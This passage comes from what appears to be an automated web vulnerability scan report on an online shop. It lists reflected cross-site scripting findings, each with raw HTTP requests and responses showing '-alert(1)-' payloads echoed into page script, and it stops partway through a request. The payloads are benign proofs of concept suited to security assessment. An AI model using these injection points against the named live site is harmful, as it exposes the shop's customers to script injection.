This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /authentication.php4dab5'-alert(1)-'2e2335fcaa6?back=order.php?step=1 HTTP/1.1
Host: shop.widevoip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://shop.widevoip.com/prices-drop.php
Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DRSnM4KTCFTs%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DVl6uLPguJfk%3DB6ZWK%2BGeBsU%3DhqnVHNXfOq0%3DDNYPxktVYKQ%3D%2FyM5fQxMLgY%3D5akioyfipcA%3DDOg9mXnF7G0%3DrRcQQCJzx5A%3DWvK9qhLYguU%3Dv%2BJlLMi4mqs%3DQ1c2A99bBVM%3D4trpz3Fyq6w%3DvUCdZwdXaeE%3D

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 15:30:46 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 17207

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
   <head>
       <title>WideVOIP</title>
       <meta ht
...[SNIP]...
<script type="text/javascript">writeBookmarkLink('http://shop.widevoip.com/authentication.php4dab5'-alert(1)-'2e2335fcaa6?back=order.php?step=1', 'WideVOIP', 'favoris');</script>
...[SNIP]...

3.19. https://shop.widevoip.com/authentication.php [back parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.widevoip.com
Path:   /authentication.php

Issue detail

The value of the back request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96dac'-alert(1)-'4e13140a073 was submitted in the back parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /authentication.php?back=order.php?step=196dac'-alert(1)-'4e13140a073 HTTP/1.1
Host: shop.widevoip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://shop.widevoip.com/prices-drop.php
Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DRSnM4KTCFTs%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DVl6uLPguJfk%3DB6ZWK%2BGeBsU%3DhqnVHNXfOq0%3DDNYPxktVYKQ%3D%2FyM5fQxMLgY%3D5akioyfipcA%3DDOg9mXnF7G0%3DrRcQQCJzx5A%3DWvK9qhLYguU%3Dv%2BJlLMi4mqs%3DQ1c2A99bBVM%3D4trpz3Fyq6w%3DvUCdZwdXaeE%3D

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:28:01 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 19038

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
   <head>
       <title>WideVOIP</title>
       <meta ht
...[SNIP]...
<script type="text/javascript">writeBookmarkLink('http://shop.widevoip.com/authentication.php?back=order.php?step=196dac'-alert(1)-'4e13140a073', 'WideVOIP', 'favoris');</script>
...[SNIP]...

3.20. https://shop.widevoip.com/authentication.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.widevoip.com
Path:   /authentication.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a809e'-alert(1)-'0dd4573b18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /authentication.php?back=order.php?step=1&a809e'-alert(1)-'0dd4573b18=1 HTTP/1.1
Host: shop.widevoip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://shop.widevoip.com/prices-drop.php
Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DRSnM4KTCFTs%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DVl6uLPguJfk%3DB6ZWK%2BGeBsU%3DhqnVHNXfOq0%3DDNYPxktVYKQ%3D%2FyM5fQxMLgY%3D5akioyfipcA%3DDOg9mXnF7G0%3DrRcQQCJzx5A%3DWvK9qhLYguU%3Dv%2BJlLMi4mqs%3DQ1c2A99bBVM%3D4trpz3Fyq6w%3DvUCdZwdXaeE%3D

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:28:58 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 18940

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
   <head>
       <title>WideVOIP</title>
       <meta ht
...[SNIP]...
<script type="text/javascript">writeBookmarkLink('http://shop.widevoip.com/authentication.php?back=order.php?step=1&amp;a809e'-alert(1)-'0dd4573b18=1', 'WideVOIP', 'favoris');</script>
...[SNIP]...

3.21. https://shop.widevoip.com/cart.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.widevoip.com
Path:   /cart.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5dbef'-alert(1)-'5b40c63d92d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cart.php5dbef'-alert(1)-'5b40c63d92d?_=1305473189315&ajax=true&token=c2f1dad279e86a94006caa0cd37aee00 HTTP/1.1
Host: shop.widevoip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: application/json, text/javascript, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: https://shop.widevoip.com/index.php/index.php
Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DRSnM4KTCFTs%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DVl6uLPguJfk%3DB6ZWK%2BGeBsU%3DhqnVHNXfOq0%3DxCL3WawnAVg%3DgU1t2cjcXek%3D3DVf7c5e2HA%3DhjdJFbhNQ0k%3D

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 15:31:48 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 16050

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
   <head>
       <title>WideVOIP</title>
       <meta ht
...[SNIP]...
<script type="text/javascript">writeBookmarkLink('http://shop.widevoip.com/cart.php5dbef'-alert(1)-'5b40c63d92d?_=1305473189315&amp;ajax=true&amp;token=c2f1dad279e86a94006caa0cd37aee00', 'WideVOIP', 'favoris');</script>
...[SNIP]...

3.22. https://shop.widevoip.com/img/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.widevoip.com
Path:   /img/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1f6d'-alert(1)-'bb10e0eb6e5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imgf1f6d'-alert(1)-'bb10e0eb6e5/favicon.ico HTTP/1.1
Host: shop.widevoip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DRSnM4KTCFTs%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DVl6uLPguJfk%3DB6ZWK%2BGeBsU%3DhqnVHNXfOq0%3DxCL3WawnAVg%3DgU1t2cjcXek%3D3DVf7c5e2HA%3DhjdJFbhNQ0k%3D

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 15:28:48 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 15988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
   <head>
       <title>WideVOIP</title>
       <meta ht
...[SNIP]...
<script type="text/javascript">writeBookmarkLink('http://shop.widevoip.com/imgf1f6d'-alert(1)-'bb10e0eb6e5/favicon.ico', 'WideVOIP', 'favoris');</script>
...[SNIP]...

3.23. https://shop.widevoip.com/img/favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.widevoip.com
Path:   /img/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbfc3'-alert(1)-'69ac8c7469c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /img/favicon.icocbfc3'-alert(1)-'69ac8c7469c HTTP/1.1
Host: shop.widevoip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DRSnM4KTCFTs%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DVl6uLPguJfk%3DB6ZWK%2BGeBsU%3DhqnVHNXfOq0%3DxCL3WawnAVg%3DgU1t2cjcXek%3D3DVf7c5e2HA%3DhjdJFbhNQ0k%3D

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 15:29:34 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 15988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
   <head>
       <title>WideVOIP</title>
       <meta ht
...[SNIP]...
<script type="text/javascript">writeBookmarkLink('http://shop.widevoip.com/img/favicon.icocbfc3'-alert(1)-'69ac8c7469c', 'WideVOIP', 'favoris');</script>
...[SNIP]...

3.24. https://shop.widevoip.com/index.php/index.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.widevoip.com
Path:   /index.php/index.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df848'-alert(1)-'1e48a97705d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.phpdf848'-alert(1)-'1e48a97705d/index.php HTTP/1.1
Host: shop.widevoip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://shops.oscommerce.com/live_shops_frameset_header.php?url=https://www.widevoip.com/shop/index.php

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 15:28:50 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DaPe%2B5Cbt0P0%3DmhLuDpazsbg%3DQ13xiiAvZnQ%3DoDcQmBCVnbQ%3DK%2Fi1Dx3NK0k%3D; expires=Sat, 04-Jun-2011 15:28:50 GMT; path=/; domain=shop.widevoip.com
Set-Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DaPe%2B5Cbt0P0%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DPxm8lIuEK70%3DYuS%2Fvxk1%2FNQ%3D8MAFH3Yi5wI%3D; expires=Sat, 04-Jun-2011 15:28:50 GMT; path=/; domain=shop.widevoip.com
Set-Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DaPe%2B5Cbt0P0%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DVRZUeHaR39U%3DPxm8lIuEK70%3Dnet3nHDNxhE%3DWekuOWehntk%3D; expires=Sat, 04-Jun-2011 15:28:50 GMT; path=/; domain=shop.widevoip.com
Set-Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DaPe%2B5Cbt0P0%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DVRZUeHaR39U%3DB6ZWK%2BGeBsU%3DhqnVHNXfOq0%3DVIIk4y0U0h4%3DCB2WkSYMNII%3D3IENIYtMMKw%3DFVlfiIV5H88%3D; expires=Sat, 04-Jun-2011 15:28:50 GMT; path=/; domain=shop.widevoip.com
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 17047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
   <head>
       <title>WideVOIP</title>
       <meta ht
...[SNIP]...
<script type="text/javascript">writeBookmarkLink('http://shop.widevoip.com/index.phpdf848'-alert(1)-'1e48a97705d/index.php', 'WideVOIP', 'favoris');</script>
...[SNIP]...

3.25. https://shop.widevoip.com/index.php/index.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.widevoip.com
Path:   /index.php/index.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d865'-alert(1)-'3fd3c2efa9b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.php/index.php8d865'-alert(1)-'3fd3c2efa9b HTTP/1.1
Host: shop.widevoip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://shops.oscommerce.com/live_shops_frameset_header.php?url=https://www.widevoip.com/shop/index.php

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:29:43 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DFWJdQb%2FjDNQ%3DmhLuDpazsbg%3DQ13xiiAvZnQ%3DNvRDSzqZp48%3DgjFFXMw%2B6QA%3D; expires=Sat, 04-Jun-2011 15:29:43 GMT; path=/; domain=shop.widevoip.com
Set-Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DFWJdQb%2FjDNQ%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DPxm8lIuEK70%3DVqODQVHfB%2FM%3D7%2FPiSNLe4gw%3D; expires=Sat, 04-Jun-2011 15:29:43 GMT; path=/; domain=shop.widevoip.com
Set-Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DFWJdQb%2FjDNQ%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DJ9dL3Ft1qSU%3DPxm8lIuEK70%3Dt9Xo7atfG1w%3Dmb7KCTi%2F5Ms%3D; expires=Sat, 04-Jun-2011 15:29:43 GMT; path=/; domain=shop.widevoip.com
Set-Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DFWJdQb%2FjDNQ%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DJ9dL3Ft1qSU%3DB6ZWK%2BGeBsU%3DhqnVHNXfOq0%3DVM0C%2BWb9gIo%3DgU1t2cjcXek%3DOWYTAk7KxGY%3DFVlfiIV5H88%3D; expires=Sat, 04-Jun-2011 15:29:43 GMT; path=/; domain=shop.widevoip.com
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 25366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
   <head>
       <title>WideVOIP</title>
       <meta ht
...[SNIP]...
<script type="text/javascript">writeBookmarkLink('http://shop.widevoip.com/index.php/index.php8d865'-alert(1)-'3fd3c2efa9b', 'WideVOIP', 'favoris');</script>
...[SNIP]...

3.26. https://shop.widevoip.com/index.php/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.widevoip.com
Path:   /index.php/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51537'-alert(1)-'10e189e9a5f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.php/index.php?51537'-alert(1)-'10e189e9a5f=1 HTTP/1.1
Host: shop.widevoip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://shops.oscommerce.com/live_shops_frameset_header.php?url=https://www.widevoip.com/shop/index.php

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:26:47 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DH6DkjTYurlM%3DmhLuDpazsbg%3DQ13xiiAvZnQ%3DRs6HnuIgnFg%3DS%2FNnwasUD%2FY%3D; expires=Sat, 04-Jun-2011 15:26:47 GMT; path=/; domain=shop.widevoip.com
Set-Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DH6DkjTYurlM%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DPxm8lIuEK70%3DHo2GXvwhbU0%3DdZjrcWH2pXE%3D; expires=Sat, 04-Jun-2011 15:26:47 GMT; path=/; domain=shop.widevoip.com
Set-Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DH6DkjTYurlM%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DCI6HEhjdnZ0%3DPxm8lIuEK70%3DU2AmFzAQleA%3Dve%2B0PNCi328%3D; expires=Sat, 04-Jun-2011 15:26:47 GMT; path=/; domain=shop.widevoip.com
Set-Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DH6DkjTYurlM%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DCI6HEhjdnZ0%3DB6ZWK%2BGeBsU%3DhqnVHNXfOq0%3DsKU5%2B6HL9Nk%3DgU1t2cjcXek%3DL8kUdihCpYc%3D9eChPCHktLg%3D; expires=Sat, 04-Jun-2011 15:26:47 GMT; path=/; domain=shop.widevoip.com
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 25462

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
   <head>
       <title>WideVOIP</title>
       <meta na
...[SNIP]...
<script type="text/javascript">writeBookmarkLink('http://shop.widevoip.com/index.php/index.php?51537'-alert(1)-'10e189e9a5f=1', 'WideVOIP', 'favoris');</script>
...[SNIP]...

3.27. https://shop.widevoip.com/modules/blockcart/blockcart-set-collapse.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.widevoip.com
Path:   /modules/blockcart/blockcart-set-collapse.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5da4c'-alert(1)-'03985f41b86 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules5da4c'-alert(1)-'03985f41b86/blockcart/blockcart-set-collapse.php?ajax_blockcart_display=expand&rand=1305473193548 HTTP/1.1
Host: shop.widevoip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: https://shop.widevoip.com/index.php/index.php
Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DRSnM4KTCFTs%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DVl6uLPguJfk%3DB6ZWK%2BGeBsU%3DhqnVHNXfOq0%3DxCL3WawnAVg%3DgU1t2cjcXek%3D3DVf7c5e2HA%3DhjdJFbhNQ0k%3D

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 15:31:15 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 16042

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
   <head>
       <title>WideVOIP</title>
       <meta ht
...[SNIP]...
<script type="text/javascript">writeBookmarkLink('http://shop.widevoip.com/modules5da4c'-alert(1)-'03985f41b86/blockcart/blockcart-set-collapse.php?ajax_blockcart_display=expand&amp;rand=1305473193548', 'WideVOIP', 'favoris');</script>
...[SNIP]...

3.28. https://shop.widevoip.com/modules/blockcart/blockcart-set-collapse.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.widevoip.com
Path:   /modules/blockcart/blockcart-set-collapse.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f822'-alert(1)-'980798d9648 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/blockcart7f822'-alert(1)-'980798d9648/blockcart-set-collapse.php?ajax_blockcart_display=expand&rand=1305473193548 HTTP/1.1
Host: shop.widevoip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: https://shop.widevoip.com/index.php/index.php
